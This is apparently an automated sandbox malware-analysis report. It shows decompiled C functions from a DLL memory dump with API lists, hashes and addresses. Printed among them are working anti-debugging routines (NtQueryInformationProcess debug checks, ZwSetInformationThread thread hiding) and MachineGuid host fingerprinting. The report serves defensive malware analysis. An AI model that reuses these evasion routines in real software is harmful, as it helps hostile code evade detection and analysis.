                                                                                                                                                • Instruction ID: 5282c0b80e2e5c01901b155bdceaa9b4f75acfd53aa6edd49772c4382101ddc9
                                                                                                                                                • Opcode Fuzzy Hash: 266f08e0f126cb4b8deb597b18c5a4e6f0f9f98ecfb3ee9ea26cd0a9d97fb6d8
                                                                                                                                                • Instruction Fuzzy Hash: EC01FFB5D00219FBEB04DFD1CD98BEEBBB8EB44305F108059E611BA280D7B59B04CB61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001A2F0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001A2F0(char* _a4, int* _a8) {
				void* _v8;
				int* _v12;

				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8) == 0) {
					if(RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8) == 0) {
						_v12 = 1;
					}
					RegCloseKey(_v8);
					return _v12;
				}
				return 0;
			}





                                                                                                                                                0x1001a2f6
                                                                                                                                                0x1001a2fd
                                                                                                                                                0x1001a321
                                                                                                                                                0x1001a344
                                                                                                                                                0x1001a34a
                                                                                                                                                0x1001a34a
                                                                                                                                                0x1001a355
                                                                                                                                                0x00000000
                                                                                                                                                0x1001a35b
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A33C
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 1001A355
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                • String ID: MachineGuid$Software\Microsoft\Cryptography
                                                                                                                                                • API String ID: 3677997916-880526231
                                                                                                                                                • Opcode ID: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                • Instruction ID: 9e24c58cdf23cf18939fbcaabd435f76492adcd0c706e8d6ab3c4d486606bf24
                                                                                                                                                • Opcode Fuzzy Hash: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                • Instruction Fuzzy Hash: 71F0F474600208FBEB10DFA4CC85F9D77B8EB04745F608044FA15AA180D775DB819765
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 10013389, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 60%
                                                                                                                                                			E10013389(void* __ebx, void* __esi) {
				void* _t1;
				long _t5;
				void* _t9;
				void* _t11;
				void* _t15;

				_t9 = __ebx;
				_t1 = TlsGetValue( *0x10332c6c);
				_t16 = _t1;
				if(_t1 != 0) {
					_push( *0x10332c68);
					_t11 =  *(TlsGetValue( *0x10332c6c))();
				}
				_pop(_t15);
				_push(0);
				_push( *0x10332c68);
				 *((intOrPtr*)(E10013034( *0x10333820)))();
				_push(_t11);
				L10013256(_t9, _t11, _t15, _t16);
				_t5 =  *0x10332c6c; // 0x1f
				if(_t5 != 0xffffffff) {
					return TlsSetValue(_t5, 0);
				}
				return _t5;
			}








                                                                                                                                                0x10013389
                                                                                                                                                0x10013396
                                                                                                                                                0x10013398
                                                                                                                                                0x1001339a
                                                                                                                                                0x1001339c
                                                                                                                                                0x100133ac
                                                                                                                                                0x100133ac
                                                                                                                                                0x100133ae
                                                                                                                                                0x100133af
                                                                                                                                                0x100133b1
                                                                                                                                                0x100133c3
                                                                                                                                                0x100133c5
                                                                                                                                                0x100133c6
                                                                                                                                                0x100133cc
                                                                                                                                                0x100133d4
                                                                                                                                                0x00000000
                                                                                                                                                0x100133d9
                                                                                                                                                0x100133df

                                                                                                                                                APIs
                                                                                                                                                • TlsGetValue.KERNEL32 ref: 10013396
                                                                                                                                                • TlsGetValue.KERNEL32 ref: 100133A8
                                                                                                                                                • __decode_pointer.LIBCMT ref: 100133BD
                                                                                                                                                • TlsSetValue.KERNEL32(0000001F,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330250,0000000C,1000EBE7), ref: 100133D9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Value$__decode_pointer
                                                                                                                                                • String ID: tj
                                                                                                                                                • API String ID: 3389472636-3491506833
                                                                                                                                                • Opcode ID: 98b685037422a500dab51c28cbe3472850961789b495b2f1d75dbfea88fe638a
                                                                                                                                                • Instruction ID: a5e655cd75536ae3ffa2bd70bd2a424c71ddb38a18ae7223bb1ec647065a0f02
                                                                                                                                                • Opcode Fuzzy Hash: 98b685037422a500dab51c28cbe3472850961789b495b2f1d75dbfea88fe638a
                                                                                                                                                • Instruction Fuzzy Hash: CDE06D31500120AEDA12A768DCC4B5D3FAAFB84260F249111F418DE1B1CF31DE96DA54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 10019F00, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                			E10019F00() {
				char _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 1;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				_v12(GetCurrentProcess(), 0x1f,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000001;
			}






                                                                                                                                                0x10019f06
                                                                                                                                                0x10019f18
                                                                                                                                                0x10019f2a
                                                                                                                                                0x10019f3e
                                                                                                                                                0x10019f4d

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F12
                                                                                                                                                • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F24
                                                                                                                                                • GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F37
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                • API String ID: 353374858-801751246
                                                                                                                                                • Opcode ID: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                • Instruction ID: 96ba2470dd98e020bf0cfbce012c3df4c205278cc2531598ec11657ea2300d3b
                                                                                                                                                • Opcode Fuzzy Hash: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                • Instruction Fuzzy Hash: F5F03075D00208FFEB00DFE0CC8DADCBB74EB04301F508094FA01A6140D6745A48CB61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 10019F50, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                			E10019F50() {
				char _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				_v12(GetCurrentProcess(), 0x1e,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}






                                                                                                                                                0x10019f56
                                                                                                                                                0x10019f68
                                                                                                                                                0x10019f7a
                                                                                                                                                0x10019f8e
                                                                                                                                                0x10019f9d

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F62
                                                                                                                                                • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F74
                                                                                                                                                • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019F87
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                • API String ID: 353374858-801751246
                                                                                                                                                • Opcode ID: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                • Instruction ID: 4290971ec9e7b3841b7fe9691c0d5d42a9a3d927b1d111e6c5789e877817e371
                                                                                                                                                • Opcode Fuzzy Hash: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                • Instruction Fuzzy Hash: 7FF0A575900218FBEB00EBE0DD89BDDBBB8EB04705F618498EA01A6280DA745A49DB65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 10019FA0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                			E10019FA0() {
				char _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				_v12(GetCurrentProcess(), 7,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}






                                                                                                                                                0x10019fa6
                                                                                                                                                0x10019fb8
                                                                                                                                                0x10019fca
                                                                                                                                                0x10019fde
                                                                                                                                                0x10019fed

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FB2
                                                                                                                                                • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FC4
                                                                                                                                                • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 10019FD7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                • API String ID: 353374858-801751246
                                                                                                                                                • Opcode ID: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                • Instruction ID: a091bf084543d9cc22bc0e3cc688341cf2a1c1168494879eaf10af3ffd9ffb2e
                                                                                                                                                • Opcode Fuzzy Hash: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                • Instruction Fuzzy Hash: EEF0C075D44208FFEB00DFE0DD4DB9DBBB8EB04301F518494FA05A6180D7745A49CB65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 10019D40, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderthreadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                			E10019D40() {
				_Unknown_base(*)()* _v8;
				struct HINSTANCE__* _v12;

				_v12 = LoadLibraryA("Ntdll.dll");
				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
				return _v8(GetCurrentThread(), 0x11, 0, 0);
			}





                                                                                                                                                0x10019d51
                                                                                                                                                0x10019d63
                                                                                                                                                0x10019d79

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(Ntdll.dll,?,100206A1), ref: 10019D4B
                                                                                                                                                • GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019D5D
                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 10019D6C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCurrentLibraryLoadProcThread
                                                                                                                                                • String ID: Ntdll.dll$ZwSetInformationThread
                                                                                                                                                • API String ID: 903204110-1680533912
                                                                                                                                                • Opcode ID: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
                                                                                                                                                • Instruction ID: 29caf765b55be7bf21a38254d48f72174c1d944e91014696290b2e85dee50fc2
                                                                                                                                                • Opcode Fuzzy Hash: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
                                                                                                                                                • Instruction Fuzzy Hash: 5CE0EC74940208FBFF00EBE0AD8DB9CBB78FB04702F618095FE01A6280DAB059058AB5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001F4A0, Relevance: 7.6, APIs: 5, Instructions: 65registrytimeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                			E1001F4A0(void* _a4, char* _a8) {
				char* _v8;
				struct _FILETIME _v12;
				void* _v16;
				struct _SYSTEMTIME _v32;
				char* _v40;
				char* _v44;
				struct _FILETIME _v52;
				char* _t43;

				_v44 = 0;
				_v40 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16) == 0) {
					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						_v32.wYear = 0x7b2;
						_v32.wMonth = 1;
						_v32.wDay = 1;
						_v32.wHour = 0;
						_v32.wMinute = 0;
						_v32.wSecond = 0;
						_v32.wMilliseconds = 0;
						SystemTimeToFileTime( &_v32,  &_v52);
						_t43 = _v8;
						asm("sbb edx, [ebp-0x2c]");
						_v44 = E1000F290(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
						_v40 = _t43;
					}
					RegCloseKey(_v16);
				}
				return _v44;
			}











                                                                                                                                                0x1001f4a6
                                                                                                                                                0x1001f4ad
                                                                                                                                                0x1001f4b4
                                                                                                                                                0x1001f4d6
                                                                                                                                                0x1001f500
                                                                                                                                                0x1001f502
                                                                                                                                                0x1001f508
                                                                                                                                                0x1001f50e
                                                                                                                                                0x1001f514
                                                                                                                                                0x1001f51a
                                                                                                                                                0x1001f520
                                                                                                                                                0x1001f526
                                                                                                                                                0x1001f534
                                                                                                                                                0x1001f540
                                                                                                                                                0x1001f543
                                                                                                                                                0x1001f554
                                                                                                                                                0x1001f557
                                                                                                                                                0x1001f557
                                                                                                                                                0x1001f55e
                                                                                                                                                0x1001f55e
                                                                                                                                                0x1001f56d

                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00000101,00000000), ref: 1001F4CE
                                                                                                                                                • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F4F8
                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F534
                                                                                                                                                • __aulldiv.LIBCMT ref: 1001F54F
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 1001F55E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3147484438-0
                                                                                                                                                • Opcode ID: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                • Instruction ID: 6ac3f46dae9d66049611ff428ba7790207c0dca18eda03b4da7369df6ee0e458
                                                                                                                                                • Opcode Fuzzy Hash: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                • Instruction Fuzzy Hash: 6D21FC75E10208ABEB00CFD4C898FEEB7B9FF48704F108548E514BB290D7B59A45CBA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001F3D0, Relevance: 7.6, APIs: 5, Instructions: 61timefileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                			E1001F3D0(char* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				struct _FILETIME _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				struct _FILETIME _v60;
				void* _v64;
				struct _SECURITY_ATTRIBUTES* _t44;

				_v28 = 0;
				_v24 = 0;
				if(PathFileExistsA(_a4) != 0) {
					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
						_v20.wYear = 0x7b2;
						_v20.wMonth = 1;
						_v20.wDay = 1;
						_v20.wHour = 0;
						_v20.wMinute = 0;
						_v20.wSecond = 0;
						_v20.wMilliseconds = 0;
						SystemTimeToFileTime( &_v20,  &_v60);
						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
						asm("sbb eax, [ebp-0x34]");
						_v28 = E1000F290(_t44, _v36.dwHighDateTime, 0x2710, 0);
						_v24 = _t44;
					}
				}
				return _v28;
			}












                                                                                                                                                0x1001f3d6
                                                                                                                                                0x1001f3dd
                                                                                                                                                0x1001f3f0
                                                                                                                                                0x1001f412
                                                                                                                                                0x1001f419
                                                                                                                                                0x1001f435
                                                                                                                                                0x1001f43b
                                                                                                                                                0x1001f441
                                                                                                                                                0x1001f447
                                                                                                                                                0x1001f44d
                                                                                                                                                0x1001f453
                                                                                                                                                0x1001f459
                                                                                                                                                0x1001f467
                                                                                                                                                0x1001f470
                                                                                                                                                0x1001f476
                                                                                                                                                0x1001f487
                                                                                                                                                0x1001f48a
                                                                                                                                                0x1001f48a
                                                                                                                                                0x1001f419
                                                                                                                                                0x1001f496

                                                                                                                                                APIs
                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 1001F3E8
                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F40C
                                                                                                                                                • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F42B
                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F467
                                                                                                                                                • __aulldiv.LIBCMT ref: 1001F482
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Time$CreateExistsPathSystem__aulldiv
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3038978132-0
                                                                                                                                                • Opcode ID: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                • Instruction ID: 94f5442095f36b7f33c28a28e912268f677076f0b3d524be3b20220ad1e1facd
                                                                                                                                                • Opcode Fuzzy Hash: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                • Instruction Fuzzy Hash: 9A21E875A10208ABEB00DFD4D899FEEB7B8EF08704F108608E505BB290D775A685CBA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 10019330, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E10019330(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t21;
				void* _t25;
				void* _t30;
				void* _t38;
				void* _t42;
				void* _t44;
				void* _t46;

				_t38 = __edi;
				_t30 = __ebx;
				_t17 = E1000CAC0(_a4);
				_t18 = E1000CAC0(_a8);
				_t44 = _t42 + 8;
				if(_t17 >= _t18) {
					_v8 = _a4;
					_v12 = 0;
					while(1) {
						_t19 = E1000CAC0(_a8);
						_t21 = E1000CAC0(_a4);
						_t46 = _t44 + 8;
						if(_t19 + _v12 > _t21) {
							break;
						}
						_t25 = E1000E89F(_t30, _a8, _t38, _v8, _a8, E1000CAC0(_a8));
						_t44 = _t46 + 0x10;
						if(_t25 != 0) {
							_v12 = _v12 + 1;
							_v8 = _v8 + 1;
							continue;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}















                                                                                                                                                0x10019330
                                                                                                                                                0x10019330
                                                                                                                                                0x1001933b
                                                                                                                                                0x10019349
                                                                                                                                                0x1001934e
                                                                                                                                                0x10019353
                                                                                                                                                0x1001935e
                                                                                                                                                0x10019361
                                                                                                                                                0x1001937c
                                                                                                                                                0x10019380
                                                                                                                                                0x10019391
                                                                                                                                                0x10019396
                                                                                                                                                0x1001939b
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100193b2
                                                                                                                                                0x100193b7
                                                                                                                                                0x100193bc
                                                                                                                                                0x10019370
                                                                                                                                                0x10019379
                                                                                                                                                0x00000000
                                                                                                                                                0x10019379
                                                                                                                                                0x00000000
                                                                                                                                                0x100193be
                                                                                                                                                0x00000000
                                                                                                                                                0x100193c7
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4218353326-0
                                                                                                                                                • Opcode ID: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
                                                                                                                                                • Instruction ID: fd93541d7ed1397f6a851c7bfd43323bc4bd1343b06978e00cafc39966250b4e
                                                                                                                                                • Opcode Fuzzy Hash: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
                                                                                                                                                • Instruction Fuzzy Hash: 571177BAE0420CE7DB10DFA8D88199E77A8DB04298F148565FD19EB345F531FF808792
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 100196D0, Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E100196D0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t24;
				void* _t27;
				void* _t28;
				void* _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t36 = __edi;
				_t28 = __ebx;
				_v8 = 0;
				if(_a4 != 0 && _a8 != 0) {
					_t20 = E1000CAC0(_a4);
					_t21 = E1000CAC0(_a8);
					_t42 = _t40 + 8;
					if(_t20 >= _t21) {
						_v12 = 0;
						while(1) {
							_t23 = E1000CAC0(_a4);
							_t24 = E1000CAC0(_a8);
							_t44 = _t42 + 8;
							if(_v12 >= _t23 - _t24) {
								goto L9;
							}
							_t27 = E1000E89F(_t28, _a8, _t36, _a4 + _v12, _a8, E1000CAC0(_a8));
							_t42 = _t44 + 0x10;
							if(_t27 != 0) {
								_v12 = _v12 + 1;
								continue;
							} else {
								_v8 = 1;
							}
							goto L9;
						}
					}
				}
				L9:
				return _v8;
			}















                                                                                                                                                0x100196d0
                                                                                                                                                0x100196d0
                                                                                                                                                0x100196d7
                                                                                                                                                0x100196e2
                                                                                                                                                0x100196f6
                                                                                                                                                0x10019704
                                                                                                                                                0x10019709
                                                                                                                                                0x1001970e
                                                                                                                                                0x10019710
                                                                                                                                                0x10019722
                                                                                                                                                0x10019726
                                                                                                                                                0x10019734
                                                                                                                                                0x10019739
                                                                                                                                                0x10019741
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001975b
                                                                                                                                                0x10019760
                                                                                                                                                0x10019765
                                                                                                                                                0x1001971f
                                                                                                                                                0x00000000
                                                                                                                                                0x10019767
                                                                                                                                                0x10019767
                                                                                                                                                0x10019767
                                                                                                                                                0x00000000
                                                                                                                                                0x10019765
                                                                                                                                                0x10019722
                                                                                                                                                0x1001970e
